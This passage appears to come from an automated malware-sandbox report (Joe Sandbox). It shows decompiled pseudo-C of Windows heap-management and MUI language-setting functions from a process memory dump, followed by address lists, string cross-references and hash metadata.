							E045E9819(_t486);
							 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) + (_v52 >> 0xc);
							 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) - _v52;
							_t366 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t366 - 0x7f000;
							if(_t366 >= 0x7f000) {
								_t104 = _t553 + 0x1ec;
								 *_t104 =  *(_t553 + 0x1ec) + _t366;
								__eflags =  *_t104;
							}
							__eflags = _v40;
							if(_v40 == 0) {
								_t533 = _v52 + _v44;
								_v32 = _t533;
								_t533[2] =  *((intOrPtr*)(_t553 + 0x54));
								__eflags = _v24 - _v52 + _v44;
								if(_v24 == _v52 + _v44) {
									__eflags =  *(_t553 + 0x4c);
									if( *(_t553 + 0x4c) != 0) {
										_t533[1] = _t533[1] ^ _t533[0] ^  *_t533;
										 *_t533 =  *_t533 ^  *(_t553 + 0x50);
									}
								} else {
									_t449 = 0;
									_t533[3] = 0;
									_t533[1] = 0;
									_t394 = _v20 - _v52 >> 0x00000003 & 0x0000ffff;
									_t491 = _t394;
									 *_t533 = _t394;
									__eflags =  *0x46d8748 - 1; // 0x0
									if(__eflags >= 0) {
										__eflags = _t491 - 1;
										if(_t491 <= 1) {
											_t404 =  *[fs:0x30];
											__eflags =  *(_t404 + 0xc);
											if( *(_t404 + 0xc) == 0) {
												_push("HEAP: ");
												E045EB150();
											} else {
												E045EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
											}
											_push("((LONG)FreeEntry->Size > 1)");
											E045EB150();
											_pop(_t491);
											__eflags =  *0x46d7bc8 - _t449; // 0x0
											if(__eflags == 0) {
												__eflags = 0;
												_t491 = 1;
												E046A2073(_t449, 1, _t541, 0);
											}
											_t533 = _v32;
										}
									}
									_t533[1] = _t449;
									__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
									if( *((intOrPtr*)(_t541 + 0x18)) != _t541) {
										_t402 = (_t533 - _t541 >> 0x10) + 1;
										_v16 = _t402;
										__eflags = _t402 - 0xfe;
										if(_t402 >= 0xfe) {
											_push(_t491);
											_push(_t449);
											E046AA80D( *((intOrPtr*)(_t541 + 0x18)), 3, _t533, _t541);
											_t533 = _v48;
											_t402 = _v32;
										}
										_t449 = _t402;
									}
									_t533[3] = _t449;
									E0460A830(_t553, _t533,  *_t533 & 0x0000ffff);
									_t447 = 0x7ffe0380;
								}
							}
							_t367 = E04607D50();
							__eflags = _t367;
							if(_t367 != 0) {
								_t370 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t370 = _t447;
							}
							__eflags =  *_t370;
							if( *_t370 != 0) {
								_t371 =  *[fs:0x30];
								__eflags =  *(_t371 + 0x240) & 1;
								if(( *(_t371 + 0x240) & 1) != 0) {
									__eflags = E04607D50();
									if(__eflags != 0) {
										_t447 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									}
									E046A1411(_t447, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _v40, _v36,  *_t447 & 0x000000ff);
								}
							}
							_t372 = E04607D50();
							_t546 = 0x7ffe038a;
							_t446 = 0x230;
							__eflags = _t372;
							if(_t372 != 0) {
								_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
								_t246 = 0x7ffe038a;
							}
							__eflags =  *_t246;
							if( *_t246 == 0) {
								goto L7;
							} else {
								__eflags = E04607D50();
								if(__eflags != 0) {
									_t546 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + _t446;
									__eflags = _t546;
								}
								_push( *_t546 & 0x000000ff);
								_push(_v36);
								_push(_v40);
								goto L120;
							}
						}
					} else {
						L19:
						_t31 = _t513 + 0x101f; // 0x101f
						_t455 = _t31 & 0xfffff000;
						_t32 = _t513 + 0x28; // 0x28
						_v44 = _t455;
						__eflags = _t455 - _t32;
						if(_t455 == _t32) {
							_t455 = _t455 + 0x1000;
							_v44 = _t455;
						}
						_t265 = _t445 << 3;
						_v24 = _t265;
						_t266 = _t265 + _t513;
						__eflags = _v40;
						_v20 = _t266;
						if(_v40 == 0) {
							_t266 = _t266 + 0xfffffff0;
							__eflags = _t266;
						}
						_t267 = _t266 & 0xfffff000;
						_v52 = _t267;
						__eflags = _t267 - _t455;
						if(_t267 < _t455) {
							__eflags =  *0x46d8748 - 1; // 0x0
							if(__eflags < 0) {
								L9:
								_t450 = _t553;
								L10:
								_push(_t445);
								goto L11;
							}
							__eflags = _v40;
							L146:
							if(__eflags == 0) {
								goto L9;
							}
							_t270 =  *[fs:0x30];
							__eflags =  *(_t270 + 0xc);
							if( *(_t270 + 0xc) == 0) {
								_push("HEAP: ");
								E045EB150();
							} else {
								E045EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("(!TrailingUCR)");
							E045EB150();
							__eflags =  *0x46d7bc8;
							if( *0x46d7bc8 == 0) {
								__eflags = 0;
								E046A2073(_t445, 1, _t541, 0);
							}
							L152:
							_t445 = _a4;
							L153:
							_t513 = _v48;
							goto L9;
						}
						_v32 = _t267;
						_t280 = _t267 - _t455;
						_v32 = _v32 - _t455;
						__eflags = _a8;
						_t460 = _v32;
						_v52 = _t460;
						if(_a8 != 0) {
							L27:
							__eflags = _t280;
							if(_t280 == 0) {
								L33:
								_t446 = 0;
								__eflags = _v40;
								if(_v40 == 0) {
									_t468 = _v44 + _v52;
									_v36 = _t468;
									_t468[2] =  *((intOrPtr*)(_t553 + 0x54));
									__eflags = _v20 - _v52 + _v44;
									if(_v20 == _v52 + _v44) {
										__eflags =  *(_t553 + 0x4c);
										if( *(_t553 + 0x4c) != 0) {
											_t468[1] = _t468[1] ^ _t468[0] ^  *_t468;
											 *_t468 =  *_t468 ^  *(_t553 + 0x50);
										}
									} else {
										_t468[3] = 0;
										_t468[1] = 0;
										_t317 = _v24 - _v52 - _v44 + _t513 >> 0x00000003 & 0x0000ffff;
										_t521 = _t317;
										 *_t468 = _t317;
										__eflags =  *0x46d8748 - 1; // 0x0
										if(__eflags >= 0) {
											__eflags = _t521 - 1;
											if(_t521 <= 1) {
												_t327 =  *[fs:0x30];
												__eflags =  *(_t327 + 0xc);
												if( *(_t327 + 0xc) == 0) {
													_push("HEAP: ");
													E045EB150();
												} else {
													E045EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
												}
												_push("(LONG)FreeEntry->Size > 1");
												E045EB150();
												__eflags =  *0x46d7bc8 - _t446; // 0x0
												if(__eflags == 0) {
													__eflags = 1;
													E046A2073(_t446, 1, _t541, 1);
												}
												_t468 = _v36;
											}
										}
										_t468[1] = _t446;
										_t522 =  *((intOrPtr*)(_t541 + 0x18));
										__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
										if( *((intOrPtr*)(_t541 + 0x18)) == _t541) {
											_t320 = _t446;
										} else {
											_t320 = (_t468 - _t541 >> 0x10) + 1;
											_v12 = _t320;
											__eflags = _t320 - 0xfe;
											if(_t320 >= 0xfe) {
												_push(_t468);
												_push(_t446);
												E046AA80D(_t522, 3, _t468, _t541);
												_t468 = _v52;
												_t320 = _v28;
											}
										}
										_t468[3] = _t320;
										E0460A830(_t553, _t468,  *_t468 & 0x0000ffff);
									}
								}
								E0460B73D(_t553, _t541, _v44 + 0xffffffe8, _v52, _v48,  &_v8);
								E0460A830(_t553, _v64, _v24);
								_t286 = E04607D50();
								_t542 = 0x7ffe0380;
								__eflags = _t286;
								if(_t286 != 0) {
									_t289 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								} else {
									_t289 = 0x7ffe0380;
								}
								__eflags =  *_t289;
								if( *_t289 != 0) {
									_t290 =  *[fs:0x30];
									__eflags =  *(_t290 + 0x240) & 1;
									if(( *(_t290 + 0x240) & 1) != 0) {
										__eflags = E04607D50();
										if(__eflags != 0) {
											_t542 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										}
										E046A1411(_t446, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _t446, _t446,  *_t542 & 0x000000ff);
									}
								}
								_t291 = E04607D50();
								_t543 = 0x7ffe038a;
								__eflags = _t291;
								if(_t291 != 0) {
									_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
								} else {
									_t246 = 0x7ffe038a;
								}
								__eflags =  *_t246;
								if( *_t246 != 0) {
									__eflags = E04607D50();
									if(__eflags != 0) {
										_t543 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
										__eflags = _t543;
									}
									_push( *_t543 & 0x000000ff);
									_push(_t446);
									_push(_t446);
									L120:
									_push( *(_t553 + 0x74) << 3);
									_push(_v52);
									_t246 = E046A1411(_t446, _t553, _v44, __eflags);
								}
								goto L7;
							}
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t339 = E0461174B( &_v44,  &_v52, 0x4000);
							__eflags = _t339;
							if(_t339 < 0) {
								L94:
								 *((intOrPtr*)(_t553 + 0x210)) =  *((intOrPtr*)(_t553 + 0x210)) + 1;
								__eflags = _v40;
								if(_v40 == 0) {
									goto L153;
								}
								E0460B73D(_t553, _t541, _v28 + 0xffffffe8, _v36, _v48,  &_a4);
								goto L152;
							}
							_t344 = E04607D50();
							__eflags = _t344;
							if(_t344 != 0) {
								_t347 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t347 = 0x7ffe0380;
							}
							__eflags =  *_t347;
							if( *_t347 != 0) {
								_t348 =  *[fs:0x30];
								__eflags =  *(_t348 + 0x240) & 1;
								if(( *(_t348 + 0x240) & 1) != 0) {
									E046A14FB(_t445, _t553, _v44, _v52, 6);
								}
							}
							_t513 = _v48;
							goto L33;
						}
						__eflags =  *_v12 - 3;
						_t513 = _v48;
						if( *_v12 == 3) {
							goto L27;
						}
						__eflags = _t460;
						if(_t460 == 0) {
							goto L9;
						}
						__eflags = _t460 -  *((intOrPtr*)(_t553 + 0x6c));
						if(_t460 <  *((intOrPtr*)(_t553 + 0x6c))) {
							goto L9;
						}
						goto L27;
					}
				}
				_t445 = _a4;
				if(_t445 <  *((intOrPtr*)(__ecx + 0x6c))) {
					_t513 = __edx;
					goto L10;
				}
				_t433 =  *((intOrPtr*)(__ecx + 0x74)) + _t445;
				_v20 = _t433;
				if(_t433 <  *((intOrPtr*)(__ecx + 0x70)) || _v20 <  *(__ecx + 0x1e8) >>  *((intOrPtr*)(__ecx + 0x240)) + 3) {
					_t513 = _t539;
					goto L9;
				} else {
					_t437 = E046099BF(__ecx, __edx,  &_a4, 0);
					_t445 = _a4;
					_t514 = _t437;
					_v56 = _t514;
					if(_t445 - 0x201 > 0xfbff) {
						goto L14;
					} else {
						E0460A830(__ecx, _t514, _t445);
						_t506 =  *(_t553 + 0x238);
						_t551 =  *((intOrPtr*)(_t553 + 0x1e8)) - ( *(_t553 + 0x74) << 3);
						_t246 = _t506 >> 4;
						if(_t551 < _t506 - _t246) {
							_t508 =  *(_t553 + 0x23c);
							_t246 = _t508 >> 2;
							__eflags = _t551 - _t508 - _t246;
							if(_t551 > _t508 - _t246) {
								_t246 = E0461ABD8(_t553);
								 *(_t553 + 0x23c) = _t551;
								 *(_t553 + 0x238) = _t551;
							}
						}
						goto L7;
					}
				}
			}

0x0460a309
0x0460a316
0x0460a319
0x0460a31d
0x0460a32d
0x0460a331
0x04651e0d
0x04651e10
0x0460a3cb
0x0460a3cb
0x0460a3bd
0x0460a3c3
0x0460a3c3
0x0460a33a
0x04651e17
0x04651e1b
0x04651e1d
0x04651e2f
0x04651e34
0x04651e36
0x04651e3c
0x04651e3c
0x04651e3c
0x04651e3c
0x04651e36
0x04651e42
0x04651e45
0x04651e47
0x0460a3f8
0x0460a3f8
0x0460a3fb
0x0460a3fd
0x04651e50
0x0460a403
0x0460a411
0x0460a411
0x0460a411
0x0460a41e
0x0460a420
0x0460a424
0x0460a427
0x0460a7c9
0x0460a7cd
0x0460a7d2
0x0460a7d9
0x0460a7e0
0x0460a7e3
0x0460a7ed
0x0460a7f3
0x0460a7f9
0x0460a7ff
0x0460a802
0x0460a807
0x0460a809
0x0460a809
0x0460a809
0x0460a80f
0x0460a80f
0x0460a812
0x0460a81c
0x0460a821
0x0460a824
0x0460a42d
0x0460a42d
0x0460a42d
0x0460a42d
0x0460a42d
0x0460a436
0x0460a43a
0x0460a609
0x0460a60d
0x0460a612
0x0460a616
0x0460a61a
0x04651e57
0x04651e59
0x00000000
0x00000000
0x04651e5f
0x0460a620
0x0460a627
0x04651e64
0x04651e66
0x04651e6c
0x04651e72
0x04651e76
0x04651e95
0x04651e9a
0x04651e78
0x04651e8d
0x04651e92
0x04651ea0
0x04651ea5
0x04651eaa
0x04651eb2
0x04651eb6
0x04651eb9
0x04651eb9
0x04651ebe
0x04651ec2
0x04651ec2
0x04651e66
0x0460a62d
0x0460a633
0x0460a636
0x0460a63a
0x0460a63c
0x0460a640
0x0460a642
0x0460a644
0x0460a644
0x0460a644
0x0460a64d
0x0460a64d
0x0460a651
0x0460a655
0x04651eca
0x04651ed1
0x00000000
0x00000000
0x04651ed7
0x00000000
0x0460a65b
0x0460a669
0x0460a66e
0x0460a670
0x00000000
0x00000000
0x0460a676
0x0460a67b
0x0460a680
0x0460a682
0x04651f1a
0x0460a688
0x0460a688
0x0460a688
0x0460a68a
0x0460a68d
0x04651f24
0x04651f2a
0x04651f31
0x04651f43
0x04651f43
0x04651f31
0x0460a693
0x0460a697
0x0460a69d
0x0460a6a0
0x0460a6a6
0x0460a6a8
0x0460a6a8
0x0460a6a8
0x0460a6a8
0x0460a6b2
0x0460a6b7
0x0460a6c1
0x0460a6c6
0x0460a6d2
0x0460a6d9
0x0460a6e3
0x0460a6e6
0x0460a6eb
0x0460a6ed
0x0460a6ed
0x0460a6ed
0x0460a6ed
0x0460a6f3
0x0460a6f8
0x0460a702
0x0460a70a
0x0460a70e
0x0460a71a
0x0460a71e
0x04651fcb
0x04651fcf
0x04651fdd
0x04651fe3
0x04651fe3
0x0460a724
0x0460a728
0x0460a72a
0x0460a72d
0x0460a737
0x0460a73a
0x0460a73c
0x0460a742
0x0460a748
0x04651f4d
0x04651f50
0x04651f56
0x04651f5c
0x04651f5f
0x04651f7e
0x04651f83
0x04651f61
0x04651f76
0x04651f7b
0x04651f89
0x04651f8e
0x04651f93
0x04651f94
0x04651f9a
0x04651f9c
0x04651f9e
0x04651fa1
0x04651fa1
0x04651fa6
0x04651fa6
0x04651f50
0x0460a74e
0x0460a751
0x0460a754
0x0460a75d
0x0460a75e
0x0460a762
0x0460a767
0x04651faf
0x04651fb0
0x04651fb9
0x04651fbe
0x04651fc2
0x04651fc2
0x0460a76d
0x0460a76d
0x0460a775
0x0460a778
0x0460a77d
0x0460a77d
0x0460a71e
0x0460a782
0x0460a787
0x0460a789
0x04651ff3
0x0460a78f
0x0460a78f
0x0460a78f
0x0460a791
0x0460a794
0x04651ffd
0x04652006
0x0465200c
0x04652017
0x04652019
0x04652024
0x04652024
0x04652024
0x04652047
0x04652047
0x0465200c
0x0460a79a
0x0460a79f
0x0460a7a4
0x0460a7a9
0x0460a7ab
0x0465205a
0x0460a7b1
0x0460a7b1
0x0460a7b1
0x0460a7b3
0x0460a7b6
0x00000000
0x0460a7bc
0x04652066
0x04652068
0x04652073
0x04652073
0x04652073
0x04652078
0x04652079
0x0465207d
0x00000000
0x0465207d
0x0460a7b6
0x0460a440
0x0460a440
0x0460a440
0x0460a446
0x0460a44c
0x0460a44f
0x0460a453
0x0460a455
0x046520b3
0x046520b9
0x046520b9
0x0460a45d
0x0460a460
0x0460a464
0x0460a466
0x0460a46b
0x0460a46f
0x0460a471
0x0460a471
0x0460a471
0x0460a474
0x0460a479
0x0460a47d
0x0460a47f
0x04652229
0x0465222f
0x0460a3c8
0x0460a3c8
0x0460a3ca
0x0460a3ca
0x00000000
0x0460a3ca
0x04652235
0x0465223a
0x0465223a
0x00000000
0x00000000
0x04652240
0x04652246
0x0465224a
0x04652269
0x0465226e
0x0465224c
0x04652261
0x04652266
0x04652274
0x04652279
0x0465227e
0x04652286
0x04652288
0x0465228d
0x0465228d
0x04652292
0x04652292
0x04652295
0x04652295
0x00000000
0x04652295
0x0460a485
0x0460a489
0x0460a48b
0x0460a48f
0x0460a493
0x0460a497
0x0460a49b
0x0460a4bb
0x0460a4bb
0x0460a4bd
0x0460a4ff
0x0460a4ff
0x0460a501
0x0460a505
0x0460a50f
0x0460a517
0x0460a51b
0x0460a527
0x0460a52b
0x04652182
0x04652185
0x04652193
0x04652199
0x04652199
0x0460a531
0x0460a535
0x0460a538
0x0460a548
0x0460a54b
0x0460a54d
0x0460a553
0x0460a559
0x04652100
0x04652103
0x04652109
0x0465210f
0x04652112
0x04652131
0x04652136
0x04652114
0x04652129
0x0465212e
0x0465213c
0x04652141
0x04652147
0x0465214d
0x04652151
0x04652154
0x04652154
0x04652159
0x04652159
0x04652103
0x0460a55f
0x0460a562
0x0460a565
0x0460a567
0x04652162
0x0460a56d
0x0460a574
0x0460a575
0x0460a579
0x0460a57e
0x04652169
0x0465216a
0x04652170
0x04652175
0x04652179
0x04652179
0x0460a57e
0x0460a584
0x0460a58f
0x0460a58f
0x0460a52b
0x0460a5ad
0x0460a5bc
0x0460a5c1
0x0460a5c6
0x0460a5cb
0x0460a5cd
0x046521a9
0x0460a5d3
0x0460a5d3
0x0460a5d3
0x0460a5d5
0x0460a5d8
0x046521b3
0x046521bc
0x046521c2
0x046521cd
0x046521cf
0x046521da
0x046521da
0x046521da
0x046521f7
0x046521f7
0x046521c2
0x0460a5de
0x0460a5e3
0x0460a5e8
0x0460a5ea
0x0465220a
0x0460a5f0
0x0460a5f0
0x0460a5f0
0x0460a5f2
0x0460a5f5
0x04652219
0x0465221b
0x0465208c
0x0465208c
0x0465208c
0x04652095
0x04652096
0x04652097
0x04652098
0x046520a4
0x046520a5
0x046520a9
0x046520a9
0x00000000
0x0460a5f5
0x0460a4bf
0x0460a4d3
0x0460a4d8
0x0460a4da
0x04651ede
0x04651ede
0x04651ee4
0x04651ee9
0x00000000
0x00000000
0x04651f07
0x00000000
0x04651f07
0x0460a4e0
0x0460a4e5
0x0460a4e7
0x046520cb
0x0460a4ed
0x0460a4ed
0x0460a4ed
0x0460a4f2
0x0460a4f5
0x046520d5
0x046520de
0x046520e4
0x046520f6
0x046520f6
0x046520e4
0x0460a4fb
0x00000000
0x0460a4fb
0x0460a4a1
0x0460a4a4
0x0460a4a8
0x00000000
0x00000000
0x0460a4aa
0x0460a4ac
0x00000000
0x00000000
0x0460a4b2
0x0460a4b5
0x00000000
0x00000000
0x00000000
0x0460a4b5
0x0460a43a
0x0460a340
0x0460a346
0x0460a600
0x00000000
0x0460a600
0x0460a34f
0x0460a351
0x0460a358
0x0460a3c6
0x00000000
0x0460a371
0x0460a37a
0x0460a37f
0x0460a382
0x0460a384
0x0460a394
0x00000000
0x0460a396
0x0460a399
0x0460a3a7
0x0460a3b0
0x0460a3b4
0x0460a3bb
0x0460a3d2
0x0460a3da
0x0460a3df
0x0460a3e1
0x0460a3e5
0x0460a3ea
0x0460a3f0
0x0460a3f0
0x0460a3e1
0x00000000
0x0460a3bb
0x0460a394

Strings

(LONG)FreeEntry->Size > 1, xrefs: 0465213C
HEAP: , xrefs: 04651E95, 04651F7E, 04652131, 04652269
(!TrailingUCR), xrefs: 04652274
(UCRBlock != NULL), xrefs: 04651EA0
((LONG)FreeEntry->Size > 1), xrefs: 04651F89
HEAP[%wZ]: , xrefs: 04651E88, 04651F71, 04652124, 0465225C

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
API String ID: 0-523794902
Opcode ID: 34c64285759e123efc8ecbaa0d910da561b8ee7bf1a33c7888d8fc448f204b92
Instruction ID: 882a7c98b69729c0d006950d11cae00de96483ec6ef01ad81238489e4921b21c
Opcode Fuzzy Hash: 34c64285759e123efc8ecbaa0d910da561b8ee7bf1a33c7888d8fc448f204b92
Instruction Fuzzy Hash: 8C42BB306047419FD719DF68C894A6BBBE5FF98344F04896DE8868B391E734F982CB52

Uniqueness

Uniqueness Score: -1.00%

Function 045F3D34 Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E045F3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E045F1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L046077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E045F1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L046077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E045F1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E045F1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E045F1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L046077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L046077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L04604620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0462F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E04631370(_t276, 0x45c4e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0462BB40(0,  &_v68, _t170);
									if(L045F43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L046077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L046077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0462BB40(_t257,  &_v68, _t243);
								if(L045F43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E04631370(_t278, 0x45c4e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L04604620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0462F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E04631370(_v16, 0x45c4e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0462BB40(_t262,  &_v68, _t244);
								if(L045F43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E04631370(_t282, 0x45c4e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0462BB40(_t262,  &_v68, _t201);
							if(L045F43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L046077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L046077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L04604620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0462F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E04631370(_t280, 0x45c4e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0462BB40(_t267,  &_v68, _t245);
							if(L045F43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E04631370(_t284, 0x45c4e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0462BB40(_t267,  &_v68, _t224);
						if(L045F43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L046077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L046077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x045f3d3c
0x045f3d42
0x045f3d44
0x045f3d46
0x045f3d49
0x045f3d4c
0x045f3d4f
0x045f3d52
0x045f3d55
0x045f3d58
0x045f3d5b
0x045f3d5f
0x045f3d61
0x045f3d66
0x04648213
0x04648218
0x045f4085
0x045f4088
0x045f408e
0x045f4094
0x045f409a
0x045f40a0
0x045f40a6
0x045f40a9
0x045f40af
0x045f40b6
0x045f40bd
0x045f40bd
0x045f3d83
0x0464821f
0x04648229
0x04648238
0x04648238
0x0464823d
0x0464823d
0x045f3da0
0x045f3daf
0x045f3db5
0x045f3dba
0x045f3dba
0x045f3dd4
0x045f3e94
0x045f3eab
0x045f3f6d
0x045f3f84
0x045f406b
0x045f406b
0x045f406e
0x045f406e
0x045f4070
0x045f4074
0x04648351
0x04648351
0x045f407a
0x045f407f
0x0464835d
0x04648370
0x04648377
0x04648379
0x0464837c
0x0464837c
0x0464835d
0x00000000
0x045f407f
0x045f3f8a
0x045f3f8d
0x045f3f90
0x045f3f95
0x0464830d
0x0464830f
0x045f3f9b
0x045f3fac
